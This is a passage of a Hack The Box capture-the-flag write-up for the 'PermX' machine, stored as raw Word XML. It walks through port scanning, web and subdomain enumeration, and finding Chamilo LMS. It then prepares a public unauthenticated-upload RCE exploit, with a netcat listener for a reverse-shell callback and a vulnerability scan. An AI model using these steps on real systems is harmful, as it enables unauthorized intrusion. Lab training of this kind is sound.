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0504D5" w14:textId="18DA9A48" w:rsidR="00A33162" w:rsidRDefault="00A33162" w:rsidP="006949D0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59F5904" wp14:editId="5DA623A8">
            <wp:extent cx="4000151" cy="3354328"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="330701992" name="Picture 89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701992" name="Picture 89" descr="A screen shot of a comput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752" cy="336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29326" w14:textId="79C78B53" w:rsidR="00B147C8" w:rsidRDefault="00B147C8" w:rsidP="00B147C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006949D0">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225682DA" w14:textId="164E0A5A" w:rsidR="00C86EEA" w:rsidRDefault="00C86EEA" w:rsidP="00C86EEA">
      <w:r>
        <w:t>HTB machines often redirect or have multiple domains served on a single server.  Making local DNS entries is</w:t>
      </w:r>
      <w:r w:rsidR="000C29E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>good practice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56450182" w14:textId="08BBE719" w:rsidR="00B147C8" w:rsidRPr="00406B6D" w:rsidRDefault="00B147C8" w:rsidP="00406B6D">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="00406B6D">
        <w:t xml:space="preserve">echo "10.10.11.23 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00406B6D">
        <w:t>permx.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00406B6D">
        <w:t>" | sudo tee -a /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00406B6D">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00406B6D">
        <w:t>/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E79F6A" w14:textId="77777777" w:rsidR="00866555" w:rsidRDefault="00866555" w:rsidP="00866555">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB94081" w14:textId="1B4C845E" w:rsidR="00B147C8" w:rsidRPr="00B147C8" w:rsidRDefault="00F378AF" w:rsidP="000C29E2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Port/Service </w:t>
      </w:r>
      <w:r w:rsidR="00B147C8" w:rsidRPr="00B147C8">
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEC3D2C" w14:textId="77777777" w:rsidR="00B147C8" w:rsidRDefault="00B147C8" w:rsidP="00B147C8">
      <w:r w:rsidRPr="00B147C8">
        <w:t>Starting off with an Nmap scan of the target provides insight into open ports and services running on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A925C3" w14:textId="1DD85CA8" w:rsidR="00D52B88" w:rsidRDefault="00D52B88" w:rsidP="00866555">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>ports=$(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p- --min-rate=1000 -T4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00BE4C42">
        <w:t>ermx</w:t>
      </w:r>
      <w:r>
        <w:t>.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A68A1" w14:textId="110B9E50" w:rsidR="00D52B88" w:rsidRDefault="00D52B88" w:rsidP="00866555">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p$ports</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00B67F88">
        <w:t>ermx</w:t>
      </w:r>
      <w:r>
        <w:t>.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72F62537" w14:textId="49514DE0" w:rsidR="00D52B88" w:rsidRDefault="00D52B88" w:rsidP="00866555">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00B67F88">
        <w:t>ermx</w:t>
      </w:r>
      <w:r>
        <w:t>.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="187C5FBB" w14:textId="77777777" w:rsidR="00866555" w:rsidRDefault="00866555" w:rsidP="00D52B88"/>
    <w:p w14:paraId="10CDE288" w14:textId="68D60EDB" w:rsidR="00FE0E28" w:rsidRDefault="00F378AF" w:rsidP="00E3544A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Web site Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE9B8E" w14:textId="5E709A2C" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="00F378AF">
      <w:r w:rsidRPr="00F378AF">
        <w:t xml:space="preserve">Now what?  Most </w:t>
      </w:r>
      <w:r w:rsidR="001F72BE">
        <w:t>HTB machine are running</w:t>
      </w:r>
      <w:r w:rsidRPr="00F378AF">
        <w:t xml:space="preserve"> HTTP and SSH with versions that are not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directly exploitable.</w:t>
      </w:r>
      <w:r w:rsidR="003170A1">
        <w:t xml:space="preserve">  So we need to dig into the web site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733AD438" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="003170A1">
      <w:r>
        <w:t>Things we can run in the background while we analyze the web page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EC63D4" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="003170A1">
      <w:r>
        <w:t>Any unlinked resources available?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BE7CAE" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="00F378AF">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B25B7">
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B25B7">
        <w:t xml:space="preserve"> http://permx.htb /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B25B7">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B25B7">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B25B7">
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B25B7">
        <w:t>/wordlists/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D952427" w14:textId="77777777" w:rsidR="00E674A3" w:rsidRDefault="00E674A3" w:rsidP="00F378AF">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FFF774" w14:textId="73BE40BE" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="002E6A47">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Download the page for lo</w:t>
      </w:r>
      <w:r w:rsidR="001545E5">
        <w:t>cal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> analysi</w:t>
      </w:r>
      <w:r w:rsidR="001545E5">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC4FDF3" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="00F378AF">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="009E3C95">
        <w:t>curl http://permx.htb -o permx.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264F20D4" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="00F378AF">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AB3EC8" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="001545E5">
      <w:r>
        <w:t>Does the web page link anywhere?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7894495B" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="00F378AF">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="006B6C2B">
        <w:t>grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B6C2B">
        <w:t>oP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B6C2B">
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B6C2B">
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B6C2B">
        <w:t>[\s=\s]*[^\"'\'']*["'\''][^\"'\''</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="006B6C2B">
        <w:t>]+[\"'\'']' permx.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF2BEE" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="00F378AF">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D53DAE" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="001545E5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Any interesting HTML comments?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ABE532" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="00F378AF">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="00653653">
        <w:t>sed ':</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00653653">
        <w:t>a;N</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00653653">
        <w:t>;$!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00653653">
        <w:t>ba;s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00653653">
        <w:t>/\n/ /g'  permx.html | sed 's/--&gt;/--&gt;\n/g' | grep -o '&lt;!--.*--&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6201E0" w14:textId="77777777" w:rsidR="00F378AF" w:rsidRDefault="00F378AF" w:rsidP="00D52B88"/>
    <w:p w14:paraId="302AC4C9" w14:textId="77777777" w:rsidR="002702E5" w:rsidRDefault="002702E5" w:rsidP="001545E5">
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="006908AD">
        <w:t>oing through the app we can tell it’s a static website</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC2F7A" w14:textId="77777777" w:rsidR="002702E5" w:rsidRPr="00B147C8" w:rsidRDefault="002702E5" w:rsidP="002702E5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3368EC7F" wp14:editId="77371CED">
            <wp:extent cx="3985556" cy="2632681"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1244788828" name="Picture 90" descr="A person in a graduation cap and g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788828" name="Picture 90" descr="A person in a graduation cap and gow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504" cy="264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66110" w14:textId="77777777" w:rsidR="002702E5" w:rsidRPr="00B147C8" w:rsidRDefault="002702E5" w:rsidP="002702E5"/>
    <w:p w14:paraId="5606ABDB" w14:textId="77777777" w:rsidR="002702E5" w:rsidRPr="00B147C8" w:rsidRDefault="002702E5" w:rsidP="002702E5">
      <w:r w:rsidRPr="00B147C8">
        <w:t>To expand our knowledge of the system, let's scan for additional subdomains beyond the identified ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FBD2F0" w14:textId="77777777" w:rsidR="002702E5" w:rsidRDefault="002702E5" w:rsidP="00DA2FB5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FD82DFC" w14:textId="77777777" w:rsidR="002702E5" w:rsidRPr="00B147C8" w:rsidRDefault="002702E5" w:rsidP="00DA2FB5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C234C">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C234C">
        <w:t xml:space="preserve"> -H "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C234C">
        <w:t>Host:FUZZ.permx.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C234C">
        <w:t>" -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C234C">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C234C">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C234C">
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C234C">
        <w:t>/directory-list-2.3-small.txt  -u "http://permx.htb" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C234C">
        <w:t>fw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C234C">
        <w:t xml:space="preserve"> 18 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BE4A07" w14:textId="0E89EC6F" w:rsidR="002702E5" w:rsidRDefault="00D86CFE" w:rsidP="00D52B88">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C401A7E" wp14:editId="67BEEEC2">
            <wp:extent cx="6129664" cy="4307224"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1701493456" name="Picture 95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493456" name="Picture 95" descr="A screenshot of a computer scree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606" cy="431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4FC44" w14:textId="77777777" w:rsidR="002702E5" w:rsidRDefault="002702E5" w:rsidP="00D52B88"/>
    <w:p w14:paraId="7A3E6ABE" w14:textId="497E9190" w:rsidR="00186862" w:rsidRDefault="00186862" w:rsidP="00D52B88">
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00872506">
        <w:t xml:space="preserve">numerate the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00872506">
        <w:t>lms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00872506">
        <w:t xml:space="preserve"> subdomain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17A0B8" w14:textId="5F537309" w:rsidR="00873818" w:rsidRPr="00406B6D" w:rsidRDefault="00873818" w:rsidP="00873818">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="00406B6D">
        <w:t xml:space="preserve">echo "10.10.11.23 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lms.</w:t>
      </w:r>
      <w:r w:rsidRPr="00406B6D">
        <w:t>permx.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00406B6D">
        <w:t>" | sudo tee -a /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00406B6D">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00406B6D">
        <w:t>/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9107BB" w14:textId="4875F9AD" w:rsidR="00872506" w:rsidRDefault="00872506" w:rsidP="00872506">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00873818">
        <w:t>lms.</w:t>
      </w:r>
      <w:r>
        <w:t>permx.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FF08283" w14:textId="77777777" w:rsidR="00872506" w:rsidRDefault="00872506" w:rsidP="00D52B88"/>
    <w:p w14:paraId="6A77B3E6" w14:textId="77777777" w:rsidR="00F72565" w:rsidRDefault="00872506" w:rsidP="00D52B88">
      <w:r>
        <w:t xml:space="preserve">Yields </w:t>
      </w:r>
      <w:r w:rsidR="00384B7A">
        <w:t>robot.txt and “forbidden” directories.</w:t>
      </w:r>
      <w:r w:rsidR="008B5A2D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00F72565">
        <w:t>We should look at everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA42E00" w14:textId="028F4EBF" w:rsidR="00E63FB2" w:rsidRDefault="00E63FB2" w:rsidP="00E63FB2">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ECC9B26" wp14:editId="090848E4">
            <wp:extent cx="3043845" cy="3890673"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="14489308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930821" name="Picture 1" descr="A screenshot of a compu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306" cy="391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0E2A1" w14:textId="77777777" w:rsidR="00E05D25" w:rsidRDefault="00E05D25" w:rsidP="00D52B88"/>
    <w:p w14:paraId="62C7A88E" w14:textId="3C764473" w:rsidR="00872506" w:rsidRDefault="00CE0794" w:rsidP="00D52B88">
      <w:r w:rsidRPr="00CE0794">
        <w:t>http://lms.permx.htb/documentation</w:t>
      </w:r>
      <w:r w:rsidR="005A61A6">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008B5A2D">
        <w:t xml:space="preserve"> leads us </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B5A2D">
        <w:t>chamilo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B57EB0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18756E5D" w14:textId="2EF98E49" w:rsidR="00292EA9" w:rsidRDefault="00842AE8" w:rsidP="00D52B88">
      <w:r>
        <w:t>Google search for “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chamilo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1.11 exploit” returns a</w:t>
      </w:r>
      <w:r w:rsidR="00C657F4">
        <w:t xml:space="preserve"> nice </w:t>
      </w:r>
      <w:r w:rsidR="00CE0794">
        <w:t>RCE</w:t>
      </w:r>
      <w:r w:rsidR="00C657F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77319D31" w14:textId="6B3EE4B8" w:rsidR="00942822" w:rsidRDefault="00942822" w:rsidP="00B147C8">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00991917">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F3C308D" w14:textId="586CD929" w:rsidR="00942822" w:rsidRDefault="00823644" w:rsidP="00B147C8">
      <w:r>
        <w:t>Read the code</w:t>
      </w:r>
      <w:r w:rsidR="00090AF8">
        <w:t>, to validate fit, and clone</w:t>
      </w:r>
      <w:r w:rsidR="006267D0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F77E7BA" w14:textId="65473C22" w:rsidR="006267D0" w:rsidRDefault="006267D0" w:rsidP="006267D0">
      <w:r>
        <w:t xml:space="preserve">The code </w:t>
      </w:r>
      <w:r w:rsidR="00626345">
        <w:t>requires</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a callback.  </w:t>
      </w:r>
      <w:r w:rsidR="00482FC9">
        <w:t>So,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in a se</w:t>
      </w:r>
      <w:r w:rsidR="00626345">
        <w:t xml:space="preserve">parate terminal window </w:t>
      </w:r>
      <w:r w:rsidR="00D14ACD">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="00626345">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>tart</w:t>
      </w:r>
      <w:r w:rsidR="00D14ACD">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260196A0" w14:textId="77777777" w:rsidR="006267D0" w:rsidRDefault="006267D0" w:rsidP="00626345">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lnvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A22D31F" w14:textId="77777777" w:rsidR="00BB59B5" w:rsidRDefault="00BB59B5" w:rsidP="00B147C8"/>
    <w:p w14:paraId="629BD624" w14:textId="778EC462" w:rsidR="00BB59B5" w:rsidRDefault="00BB59B5" w:rsidP="006475F8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We will need </w:t>
      </w:r>
      <w:r w:rsidR="00226064">
        <w:t>our local address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BE3612" w14:textId="1727F1CF" w:rsidR="00226064" w:rsidRPr="00B147C8" w:rsidRDefault="00226064" w:rsidP="00B147C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="727442D3" wp14:editId="70AA2231">
            <wp:extent cx="5506872" cy="2697347"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1026355269" name="Picture 3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355269" name="Picture 3" descr="A screenshot of a computer pro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797" cy="270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7AC28" w14:textId="282F5F34" w:rsidR="000C51AE" w:rsidRDefault="000C51AE" w:rsidP="000C51AE">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="003C2ABB">
        <w:t>it clone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00B56985" w:rsidRPr="00BE05B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2434EE5A" w14:textId="6108310B" w:rsidR="00B56985" w:rsidRDefault="00B56985" w:rsidP="000C51AE">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="00B56985">
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B56985">
        <w:t>chamilo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B56985">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B56985">
        <w:t>lms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B56985">
        <w:t>-unauthenticated-big-upload-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B56985">
        <w:t>rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B56985">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B56985">
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B56985">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E95F58F" w14:textId="77777777" w:rsidR="002F462D" w:rsidRDefault="002F462D" w:rsidP="000C51AE">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B31065D" w14:textId="64744853" w:rsidR="005A54F3" w:rsidRDefault="002F462D" w:rsidP="002F462D">
      <w:r>
        <w:t>Validate the site is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23224890" w14:textId="27ED470E" w:rsidR="005A6EF8" w:rsidRDefault="00AF2AFF" w:rsidP="000C51AE">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>python3 main.py -u http://lms.permx.htb/ -a scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E02BC" w14:textId="1698984B" w:rsidR="00603359" w:rsidRDefault="00603359" w:rsidP="000C51AE">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77174424" wp14:editId="13962D78">
            <wp:extent cx="4749421" cy="764745"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84783607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83607" name="Picture 2" descr="A screenshot of a compute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4815" cy="77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BD021" w14:textId="77777777" w:rsidR="002F462D" w:rsidRDefault="002F462D" w:rsidP="000C51AE">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED8FEE1" w14:textId="3D1C7373" w:rsidR="00D8562F" w:rsidRDefault="00D8562F" w:rsidP="00212D59">
      <w:r>
        <w:t>Optional enable interaction via the web</w:t>
      </w:r>
    </w:p>
